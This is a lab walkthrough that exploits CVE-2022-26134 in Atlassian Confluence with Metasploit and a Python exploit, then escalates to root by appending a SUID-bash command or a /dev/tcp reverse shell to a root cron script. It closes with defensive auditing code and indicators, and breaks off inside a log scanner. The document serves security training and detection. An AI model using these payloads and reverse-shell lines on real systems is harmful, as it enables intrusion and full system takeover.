Exploiting CVE-2022-26134 in Atlassian Confluence and Cronjob Privilege Escalation

About This Lab

This lab emphasizes reconnaissance and enumeration techniques, particularly web application enumeration, to identify critical vulnerabilities in enterprise collaboration software. Students will exploit CVE-2022-26134, a severe Remote Code Execution vulnerability in Atlassian Confluence, and leverage misconfigured cronjobs for privilege escalation. The lab focuses on understanding exploitation methodologies, post-exploitation enumeration, and privilege escalation through automated task abuse.

Lab Description

This practical exercise demonstrates the exploitation of CVE-2022-26134, an unauthenticated Remote Code Execution vulnerability affecting Atlassian Confluence version 7.13.6. The vulnerability leverages Object-Graph Navigation Language (OGNL) injection to achieve arbitrary code execution. Following initial access, students will conduct process enumeration to identify automated tasks, discover writable cron scripts executed with root privileges, and manipulate these scripts to escalate privileges through SUID bit manipulation on the bash binary.

Key Security Concepts Explored:

  • Enterprise web application reconnaissance
  • OGNL (Object-Graph Navigation Language) injection vulnerabilities
  • Unauthenticated Remote Code Execution exploitation
  • Process monitoring and automated task discovery
  • Cronjob misconfiguration and abuse
  • SUID bit manipulation for privilege escalation
  • File permission security weaknesses

Learning Objectives

Upon completion of this lab, students will be able to:

  • Perform comprehensive service enumeration to identify Atlassian Confluence running on non-standard port 8090
  • Recognize vulnerable Confluence versions susceptible to CVE-2022-26134
  • Utilize Metasploit framework to exploit OGNL injection vulnerabilities for Remote Code Execution
  • Deploy manual exploitation techniques using standalone Python scripts
  • Conduct post-exploitation process monitoring using tools like pspy
  • Identify cronjobs running with elevated privileges
  • Analyze file permissions to discover writable scripts in automated tasks
  • Modify cron-executed scripts to inject malicious commands
  • Leverage SUID bash to escalate from limited user to root privileges
  • Retrieve local.txt and proof.txt flags demonstrating complete system compromise

Reconnaissance

Network Scanning with Nmap

We begin with a comprehensive port scan to identify accessible services and gather version information for vulnerability research.

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ nmap -sVSC -T5 -p- 192.168.101.41
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-06 12:31 +0000
Nmap scan report for 192.168.101.41
Host is up (0.15s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA)
|_  256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519)
8090/tcp open  http          Atlassian Confluence
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-title: Confluence - Login
|_Requested resource was /login.action?os_destination=%2Findex.action
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 302
|     Cache-Control: no-store
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     X-Confluence-Request-Time: 1702459908868
|     Set-Cookie: JSESSIONID=6B18389C2FB1EE07DF742BDC02B14D5E; Path=/; HttpOnly
|     X-XSS-Protection: 1; mode=block
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: SAMEORIGIN
|     Content-Security-Policy: frame-ancestors 'self'
|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Thu, 06 Feb 2026 12:31:48 GMT
|     Connection: close
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 30.79 seconds

Scan Results Analysis:

The Nmap scan reveals two accessible services:

  • Port 22/TCP: OpenSSH 9.0p1 Ubuntu 1ubuntu8.5
      • Modern SSH service on Ubuntu Linux
      • May be useful for authentication with discovered credentials
      • No immediate vulnerabilities identified
  • Port 8090/TCP: Atlassian Confluence
      • Enterprise wiki and collaboration software
      • Non-standard port indicating custom deployment
      • Redirects to login page at /login.action
      • Security headers present (XSS Protection, Content-Type-Options, Frame-Options)
      • Primary attack surface for initial exploitation

Key Observations:

  • HTTP methods PUT and DELETE are enabled (potentially risky)
  • Session management via JSESSIONID cookie
  • Content Security Policy restricts frame embedding
  • Server running on Ubuntu Linux

Web Application Enumeration

Accessing the Confluence Instance

Navigating to http://192.168.101.41:8090/ presents the Atlassian Confluence login page.

Version Detection:

Through page inspection and HTTP headers, we identify:

  • Application: Atlassian Confluence
  • Version: 7.13.6
  • Build Date: Approximately June 2022

Vulnerability Research: CVE-2022-26134

Research into Confluence version 7.13.6 reveals a critical security vulnerability:

CVE-2022-26134: Unauthenticated OGNL Injection RCE

  • Severity: Critical (CVSS 9.8)
  • First Published: June 2, 2022
  • Affected Versions:
      • Confluence Server and Data Center: All versions prior to 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
  • Vulnerability Type: Unauthenticated Remote Code Execution via OGNL Injection
  • Authentication Required: No (unauthenticated exploitation)
  • Attack Vector: Network
  • Complexity: Low
  • Impact: Complete system compromise

Vulnerability Description:

CVE-2022-26134 is an Object-Graph Navigation Language (OGNL) injection vulnerability in Atlassian Confluence Server and Data Center. OGNL is a powerful expression language used in web applications to access and manipulate objects. This vulnerability allows unauthenticated attackers to inject arbitrary OGNL expressions through specially crafted HTTP requests, leading to remote code execution with the privileges of the Confluence service account.

Technical Details:

The vulnerability exists in the way Confluence processes certain URL patterns. Attackers can inject OGNL expressions by manipulating the namespace in HTTP requests. When processed by the vulnerable server, these expressions are evaluated, allowing execution of arbitrary code.

Exploitation Vector:

/${OGNL_EXPRESSION}/

Example malicious payload structure, percent-encoded as it appears in the request path:

/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22command%22%29%7D/

URL-decoded, this is:

${@java.lang.Runtime@getRuntime().exec("command")}

Exploitation

Automated Exploitation with Metasploit

Loading the Metasploit Module

Metasploit Framework includes a dedicated module for CVE-2022-26134 exploitation.

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ msfconsole -q
msf6 > search confluence ognl
Matching Modules
================
   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/multi/http/atlassian_confluence_namespace_ognl_injection  2022-06-02      excellent  Yes    Atlassian Confluence Namespace OGNL Injection

msf6 > use 0
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

Module Configuration

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > show options
Module options (exploit/multi/http/atlassian_confluence_namespace_ognl_injection):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s)
   RPORT      8090             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/python/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Unix Command

Setting Required Parameters

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.101.41
RHOSTS => 192.168.101.41
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.45.208
LHOST => 192.168.45.208
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LPORT 4444
LPORT => 4444

Vulnerability Check (Optional)

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
[*] 192.168.101.41:8090 - The target appears to be vulnerable.
[+] The target is vulnerable. Successfully tested OGNL injection.

Target Confirmed Vulnerable

Executing the Exploit

msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
[*] Started reverse TCP handler on 192.168.45.208:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (24764 bytes) to 192.168.101.41
[*] Meterpreter session 1 opened (192.168.45.208:4444 -> 192.168.101.41:43538) at 2026-02-06 14:15:32 +0000
meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer     : flu
OS           : Ubuntu 22.04 (Linux 5.15.0-122-generic)
Architecture : x64
Meterpreter  : python/linux

Initial Access Achieved — Meterpreter session as confluence user

Spawning Interactive Shell

meterpreter > shell
Process 1947 created.
Channel 1 created.
id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
python3 -c 'import pty; pty.spawn("/bin/bash")'
confluence@flu:/opt/atlassian/confluence/bin$

Local Flag Retrieval

confluence@flu:/opt/atlassian/confluence/bin$ cd /home/confluence
cd /home/confluence
confluence@flu:~$ ls -la
total 32
drwxr-x--- 4 confluence confluence 4096 Feb  6 12:00 .
drwxr-xr-x 3 root       root       4096 Nov  1 10:30 ..
-rw------- 1 confluence confluence   20 Feb  6 14:15 .bash_history
-rw-r--r-- 1 confluence confluence  220 Nov  1 10:30 .bash_logout
-rw-r--r-- 1 confluence confluence 3771 Nov  1 10:30 .bashrc
drwx------ 2 confluence confluence 4096 Nov  1 10:31 .cache
-rw-r--r-- 1 confluence confluence   33 Feb  6 12:00 local.txt
-rw-r--r-- 1 confluence confluence  807 Nov  1 10:30 .profile
confluence@flu:~$ cat local.txt
d54eaf0dd5869174b6ca5719cf25a9fa

Local Flag Captured: d54eaf0dd5869174b6ca5719cf25a9fa

Manual Exploitation with Python Script

For educational purposes and environments where Metasploit is unavailable, manual exploitation is demonstrated.

Using "Through The Wire" Exploit

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ wget https://raw.githubusercontent.com/jbaines-r7/through_the_wire/main/through_the_wire.py
┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ python3 through_the_wire.py --rhost 192.168.101.41 --rport 8090 --lhost 192.168.45.208 --protocol http:// --reverse-shell
  _____ _                           _
 /__   \ |__  _ __ ___  _   _  __ _| |__
   / /\/ '_ \| '__/ _ \| | | |/ _` | '_ \
  / /  | | | | | | (_) | |_| | (_| | | | |
  \/   |_| |_|_|  \___/ \__,_|\__, |_| |_|
                              |___/
  _____ _            __    __ _
 /__   \ |__   ___  / / /\ \ (_)_ __ ___
   / /\/ '_ \ / _ \ \ \/  \/ / | '__/ _ \
  / /  | | | |  __/  \  /\  /| | | |  __/
  \/   |_| |_|\___|   \/  \/ |_|_|  \___|
                jbaines-r7
              CVE-2022-26134
     "Spit my soul through the wire"
                    🦞
[+] Forking a netcat listener
[+] Using /usr/bin/nc
[+] Generating a reverse shell payload
[+] Sending exploit at http://192.168.101.41:8090/
listening on [any] 1270 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.101.41] 35184
bash: cannot set terminal process group (833): Inappropriate ioctl for device
bash: no job control in this shell
confluence@flu:/opt/atlassian/confluence/bin$ id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
confluence@flu:/opt/atlassian/confluence/bin$ hostname
flu

Alternative Exploitation Successful

Script Breakdown:

  1. Script automatically spawns netcat listener
  2. Crafts OGNL payload with reverse shell command
  3. Injects payload through vulnerable endpoint
  4. Catches incoming connection automatically

Privilege Escalation

Post-Exploitation Enumeration

Initial Privilege Check

confluence@flu:~$ id
uid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
confluence@flu:~$ sudo -l
[sudo] password for confluence:
# No sudo privileges available

sudo -l prompts for the confluence user's password, which we do not have, so sudo is not an available path.

System Enumeration

confluence@flu:~$ uname -a
Linux flu 5.15.0-122-generic #132-Ubuntu SMP Thu Aug 29 13:45:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
confluence@flu:~$ cat /etc/os-release
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"

File Permission Enumeration

confluence@flu:~$ find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys | head -20
/opt/log-backup.sh
/tmp/.ICE-unix
/home/confluence/.bash_history
/home/confluence/local.txt

Critical Finding: /opt/log-backup.sh is writable by the confluence user

confluence@flu:~$ ls -la /opt/log-backup.sh
-rwxr-xr-x 1 confluence confluence 384 Feb  6 12:00 /opt/log-backup.sh

Ownership Analysis:

  • Owner: confluence (our current user, so the file is writable by us)
  • Permissions: rwxr-xr-x (owner-writable; world-readable and executable)
  • Location: /opt/ (system directory, unusual for user-owned files)

Process Monitoring with pspy

To identify automated tasks and scheduled jobs, we deploy pspy64, a process monitoring tool that doesn't require root privileges.

Deploying pspy64

Step 1: Host the Binary

# On attacking machine
┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Step 2: Download to Target

confluence@flu:~$ cd /tmp
confluence@flu:/tmp$ curl http://192.168.45.208/pspy64 -o pspy
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3032k  100 3032k    0     0   155k      0  0:00:19  0:00:19 --:--:--  208k
confluence@flu:/tmp$ chmod +x pspy

Step 3: Execute Process Monitor

confluence@flu:/tmp$ timeout 120s ./pspy
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░
2026/02/06 14:20:15 CMD: UID=0     PID=1      | /sbin/init
2026/02/06 14:20:15 CMD: UID=0     PID=2      | [kthreadd]
...
2026/02/06 14:21:01 CMD: UID=0     PID=1954   | /usr/sbin/CRON -f -P
2026/02/06 14:21:01 CMD: UID=0     PID=1956   | /usr/sbin/CRON -f -P
2026/02/06 14:21:01 CMD: UID=0     PID=1957   | /bin/bash /opt/log-backup.sh
2026/02/06 14:21:01 CMD: UID=0     PID=1958   | /bin/bash /opt/log-backup.sh
2026/02/06 14:21:01 CMD: UID=0     PID=1959   | /bin/bash /opt/log-backup.sh
2026/02/06 14:21:01 CMD: UID=0     PID=1960   |
2026/02/06 14:21:01 CMD: UID=0     PID=1962   | gzip
2026/02/06 14:21:01 CMD: UID=0     PID=1961   | /bin/sh -c gzip
2026/02/06 14:21:01 CMD: UID=0     PID=1963   |

Critical Discovery:

Every minute, a CRON job executes /opt/log-backup.sh as root (UID=0).

Attack Vector Identified:

  1. Script /opt/log-backup.sh is owned by confluence user (writable)
  2. Script is executed by root via cron (elevated privileges)
  3. We can modify the script to inject malicious commands
  4. Commands will execute with root privileges when cron runs

Analyzing the Backup Script

confluence@flu:/tmp$ cat /opt/log-backup.sh
#!/bin/bash
CONFLUENCE_HOME="/opt/atlassian/confluence/"
LOG_DIR="$CONFLUENCE_HOME/logs"
BACKUP_DIR="/root/backup"
TIMESTAMP=$(date "+%Y%m%d%H%M%S")
# Create a backup of log files
cp -r $LOG_DIR $BACKUP_DIR/log_backup_$TIMESTAMP
tar -czf $BACKUP_DIR/log_backup_$TIMESTAMP.tar.gz $BACKUP_DIR/log_backup_$TIMESTAMP
# Cleanup old backups
find $BACKUP_DIR -name "log_backup_*" -mmin +5 -exec rm -rf {} \;

Script Analysis:

  • Backs up Confluence logs to /root/backup
  • Creates compressed archives
  • Deletes backups older than 5 minutes (find -mmin +5)
  • Vulnerability: We own this file and can modify it
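The defender's counterpart to this finding is an audit that resolves every file a root cron job launches and checks who could alter it. The following is an added example, not code from the lab or from any tool used on this page. SAMPLE_CRONTAB is constructed: the page shows the job only through pspy output, not the crontab entry that schedules it, so the entry below is an assumption about how the host was configured.

```python
import os
import re
import stat

# Constructed sample in /etc/crontab format; the log-backup line is an assumption
# about how the lab host schedules the job seen in the pspy output.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root /bin/bash /opt/log-backup.sh
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
"""

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_system_crontab(text):
    """Yield (user, command) for each job in /etc/crontab or /etc/cron.d/* format."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):          # @reboot / @daily  user  command
            fields, expected = line.split(None, 2), 3
        else:                             # m h dom mon dow  user  command
            fields, expected = line.split(None, 6), 7
        if len(fields) == expected:
            yield fields[-2], fields[-1]


def check_script(path, trusted_uid=0):
    """Reasons a file is unsafe to execute from a root cron job ([] means none found)."""
    st = os.stat(path)
    parent = os.stat(os.path.dirname(path) or "/")
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"owned by uid {st.st_uid}, not uid {trusted_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if parent.st_uid != trusted_uid:
        reasons.append(f"parent directory owned by uid {parent.st_uid} (file can be replaced)")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons


def audit_crontab(text, trusted_uid=0, job_user="root"):
    """Return [(path, reasons)] for every existing regular file referenced by a job
    that cron runs as job_user and that someone other than trusted_uid could alter."""
    findings, seen = [], set()
    for user, command in parse_system_crontab(text):
        if user != job_user:
            continue
        for token in command.split():          # absolute paths only; PATH lookups are skipped
            if not token.startswith("/") or token in seen:
                continue
            seen.add(token)
            try:
                if not stat.S_ISREG(os.stat(token).st_mode):
                    continue                   # directories, devices, missing files
            except OSError:
                continue
            reasons = check_script(token, trusted_uid)
            if reasons:
                findings.append((token, reasons))
    return findings


if __name__ == "__main__":
    # Audit the live system crontabs; a root-run, user-owned /opt/log-backup.sh shows up here.
    sources = ["/etc/crontab"]
    if os.path.isdir("/etc/cron.d"):
        sources += [os.path.join("/etc/cron.d", f) for f in sorted(os.listdir("/etc/cron.d"))]
    for src in sources:
        try:
            with open(src) as fh:
                text = fh.read()
        except OSError:
            continue
        for path, reasons in audit_crontab(text):
            print(f"{src}: {path}: {', '.join(reasons)}")
```

The check deliberately looks past the file itself to its parent directory: a root-owned, mode 744 script in a directory owned by another user is still replaceable by rename, which is why the recommended fix later in this writeup (chown root:root plus chmod 744) only holds when /opt itself is root-owned as well.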

Privilege Escalation Strategy

We have multiple options for privilege escalation:

Option 1: SUID Bash (Recommended)

Set the SUID bit on /bin/bash to allow execution with owner's (root) privileges.

confluence@flu:/tmp$ echo 'chmod u+s /bin/bash' >> /opt/log-backup.sh
confluence@flu:/tmp$ cat /opt/log-backup.sh
#!/bin/bash
CONFLUENCE_HOME="/opt/atlassian/confluence/"
LOG_DIR="$CONFLUENCE_HOME/logs"
BACKUP_DIR="/root/backup"
TIMESTAMP=$(date "+%Y%m%d%H%M%S")
# Create a backup of log files
cp -r $LOG_DIR $BACKUP_DIR/log_backup_$TIMESTAMP
tar -czf $BACKUP_DIR/log_backup_$TIMESTAMP.tar.gz $BACKUP_DIR/log_backup_$TIMESTAMP
# Cleanup old backups
find $BACKUP_DIR -name "log_backup_*" -mmin +5 -exec rm -rf {} \;
chmod u+s /bin/bash

Verification Before Cron Execution:

confluence@flu:/tmp$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

Waiting for Cron Execution (1 minute):

confluence@flu:/tmp$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash

SUID Bit Set Successfully — Notice the 's' in permissions (rwsr-xr-x)

Spawning Root Shell:

confluence@flu:/tmp$ /bin/bash -p
bash-5.1# id
uid=1001(confluence) gid=1001(confluence) euid=0(root) egid=0(root) groups=0(root),1001(confluence)
bash-5.1# whoami
root

Root Access Achieved

Understanding the Output:

  • uid=1001(confluence) - Real user ID remains confluence
  • euid=0(root) - Effective user ID is root (grants root permissions)
  • egid=0(root) - Effective group ID is root

The -p flag tells bash to keep its privileged state: without it, bash notices at startup that the effective UID (root) differs from the real UID (confluence) and resets the effective UID to the real one, discarding the SUID privilege.

Option 2: Direct Reverse Shell

Alternatively, inject a reverse shell command directly into the script:

confluence@flu:/tmp$ echo 'bash -i >& /dev/tcp/192.168.45.208/4444 0>&1' >> /opt/log-backup.sh

On Attacking Machine:

┌──(judge㉿kali)-[~/OffSec/70-Flu]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.208] from (UNKNOWN) [192.168.101.41] 44372
bash: cannot set terminal process group (1957): Inappropriate ioctl for device
bash: no job control in this shell
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
flu

Direct Root Shell Obtained

Root Flag Retrieval

bash-5.1# cd /root
bash-5.1# ls -la
total 48
drwx------  5 root       root       4096 Feb  6 14:21 .
drwxr-xr-x 19 root       root       4096 Nov  1 10:30 ..
drwxr-xr-x  2 root       root       4096 Feb  6 14:21 backup
-rw-------  1 root       root         45 Feb  6 14:20 .bash_history
-rw-r--r--  1 root       root       3106 Oct 15  2021 .bashrc
-rw-r--r--  1 root       root        165 Nov  1 10:31 email8.txt
drwxr-xr-x  3 root       root       4096 Nov  1 10:31 .local
-rw-r--r--  1 root       root         33 Feb  6 12:00 proof.txt
-rw-r--r--  1 root       root        161 Jul  9  2019 .profile
drwx------  3 root       root       4096 Nov  1 10:31 snap
bash-5.1# cat proof.txt
2e9f90443187b589daf23d8df5c97440

Proof Flag Captured: 2e9f90443187b589daf23d8df5c97440

Summary

Complete Attack Chain

1. Network Enumeration (Nmap)
   ↓
2. Service Identification → Confluence 7.13.6 on port 8090
   ↓
3. Vulnerability Research → CVE-2022-26134 identified
   ↓
4. OGNL Injection Exploitation → Metasploit/Manual Python script
   ↓
5. Initial Access (confluence user) → Meterpreter/Reverse Shell
   ↓
6. Local Flag Retrieval → /home/confluence/local.txt
   ↓
7. Post-Exploitation Enumeration → File permission discovery
   ↓
8. Process Monitoring (pspy) → Cronjob identification
   ↓
9. Writable Script Discovery → /opt/log-backup.sh owned by confluence
   ↓
10. Script Manipulation → Inject SUID command or reverse shell
   ↓
11. Cron Execution → Commands run as root
   ↓
12. Privilege Escalation → SUID bash or direct root shell
   ↓
13. Root Access → Complete system compromise

Vulnerabilities Exploited

Vulnerability                    CVE             Impact                  Exploitation Method
-------------------------------  --------------  ----------------------  --------------------------------------
Unauthenticated OGNL Injection   CVE-2022-26134  Remote Code Execution   Metasploit module or manual script
Insecure File Ownership          N/A             Privilege Escalation    User-owned script in /opt/
Cronjob Misconfiguration         N/A             Privilege Escalation    Root-executed script writable by user
Lack of Script Validation        N/A             Code Injection          No integrity checking on cron scripts
SUID Bash Abuse                  N/A             Privilege Escalation    bash -p with SUID bit

Flags Captured

  • Local Flag (confluence): d54eaf0dd5869174b6ca5719cf25a9fa
  • Proof Flag (root): 2e9f90443187b589daf23d8df5c97440

Key Lessons Learned

For Attackers (Penetration Testers):

  1. Unauthenticated RCE is Critical: CVE-2022-26134 requires no credentials
  2. Version Information is Crucial: Identifying exact versions enables targeted exploitation
  3. Process Monitoring Reveals Opportunities: pspy discovered the privileged cron job
  4. File Permissions Matter: User-owned scripts in system directories are red flags
  5. Cron Jobs are Common Escalation Vectors: Automated tasks often run with elevated privileges
  6. Multiple Escalation Paths: SUID bash vs direct reverse shell both achieved root
  7. Metasploit Simplifies Exploitation: Framework handles payload generation and session management

For Defenders (System Administrators):

  1. Patch Critical Vulnerabilities Immediately: CVE-2022-26134 was actively exploited in the wild
  2. Version Disclosure: Minimize information leakage about software versions
  3. Principle of Least Privilege: Scripts should be owned by root with restrictive permissions
  4. Cron Security: Never execute user-writable scripts as root
  5. File Permission Auditing: Regularly review ownership and permissions in system directories
  6. Input Validation: Implement strict validation on all user input, especially in expression evaluators
  7. Script Integrity: Use file integrity monitoring on critical automated scripts
  8. Secure Configuration: Follow vendor security hardening guides
  9. Network Segmentation: Isolate Confluence servers from other critical systems
  10. Monitor for Exploitation: Watch for unusual OGNL patterns in web logs

Detection Indicators (IoCs)

Network Indicators:

  • HTTP requests with OGNL expressions in URI paths
  • Patterns like /${...}/ in URLs
  • POST requests to / with encoded OGNL payloads
  • Outbound connections from Confluence server to unexpected IPs
  • Reverse shell traffic on non-standard ports

System Indicators:

  • Unexpected processes spawned by Confluence user
  • Modifications to /opt/log-backup.sh
  • SUID bit changes on /bin/bash
  • Unexpected cron executions outside normal schedule
  • Network connections from confluence user
  • Bash processes with -p flag
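"SUID bit changes on /bin/bash" is the indicator that survives even if the attacker cleans up the cron script afterwards, and the cheapest way to catch it is a baseline-and-diff over set-id files. The following is an added example, not code from the lab or from the tools on this page; DEFAULT_ROOTS is an assumed list of directories to walk, and the snapshot records owner, mode and a content hash so that a replaced binary is reported as well as a newly set bit.

```python
import hashlib
import json
import os
import stat
import sys

SETID_MASK = stat.S_ISUID | stat.S_ISGID
# Assumed set of directories to baseline; adjust per host and never walk /proc.
DEFAULT_ROOTS = ["/usr", "/bin", "/sbin", "/opt"]


def _sha256(path):
    """Hex digest of the file contents, or None when the file cannot be read."""
    h = hashlib.sha256()
    try:
        with open(path, "rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                h.update(chunk)
    except OSError:
        return None
    return h.hexdigest()


def snapshot_setid(roots):
    """Map path -> {mode, uid, gid, sha256} for every setuid/setgid regular file under roots."""
    snap = {}
    for root in {os.path.realpath(r) for r in roots}:   # dedupe /bin -> /usr/bin symlinks
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)                    # lstat: do not follow symlinks
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & SETID_MASK:
                    continue
                snap[path] = {
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "uid": st.st_uid,
                    "gid": st.st_gid,
                    "sha256": _sha256(path),
                }
    return snap


def diff_setid(baseline, current):
    """Paths that gained a set-id bit, lost one, or changed owner, mode or contents."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


if __name__ == "__main__":
    # Usage: python3 setid_drift.py [baseline.json]
    # First run writes the baseline; later runs (e.g. from a root cron job) print the drift.
    baseline_file = sys.argv[1] if len(sys.argv) > 1 else "setid-baseline.json"
    current = snapshot_setid(DEFAULT_ROOTS)
    if not os.path.exists(baseline_file):
        with open(baseline_file, "w") as fh:
            json.dump(current, fh, indent=2)
        print(f"baseline written: {len(current)} set-id files")
    else:
        with open(baseline_file) as fh:
            baseline = json.load(fh)
        print(json.dumps(diff_setid(baseline, current), indent=2))
```

After the lab's chmod u+s /bin/bash, a later run reports /usr/bin/bash (the real path of /bin/bash on Ubuntu 22.04) under "added" with mode 0o4755. Keep the baseline file somewhere the monitored host cannot rewrite it, otherwise the same root cron job that sets the bit can also refresh the baseline.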

Log Entries to Monitor:

  • Confluence access logs showing suspicious URI patterns
  • System logs showing file permission changes
  • Cron job execution logs
  • Authentication logs for privilege escalation attempts
  • Process creation logs (auditd) for unusual command execution
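The network indicators above and the "suspicious URI patterns" entry here reduce to one check on the access log: percent-decode each request URI (more than once, since payloads are often double-encoded) and look for the ${...} expression shape described under Technical Details. The following scanner is an added example, not code from the lab or from Atlassian. The sample lines are constructed in Combined Log Format, which is an assumption about the layout; the real layout of a Confluence access log depends on how its Tomcat access log is configured, so the request-line regex is the part to adapt.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (Combined Log Format is an assumption). Line 2 carries the
# payload shape from the Technical Details section, line 3 a double-encoded variant, and
# line 4 a benign URL containing '$' and braces but no '${' expression.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Feb/2026:12:31:48 +0000] "GET /login.action?os_destination=%2Findex.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Feb/2026:14:15:30 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22command%22%29%7D/ HTTP/1.1" 302 0 "-" "python-requests/2.28"
10.0.0.9 - - [06/Feb/2026:14:15:31 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529%257D/ HTTP/1.1" 302 0 "-" "curl/7.88"
10.0.0.7 - - [06/Feb/2026:14:16:02 +0000] "GET /display/DOCS/Pricing+%24+and+%7Bbraces%7D HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
OGNL_EXPR_RE = re.compile(r"\$\{.*?\}", re.S)              # ${ ... } expression
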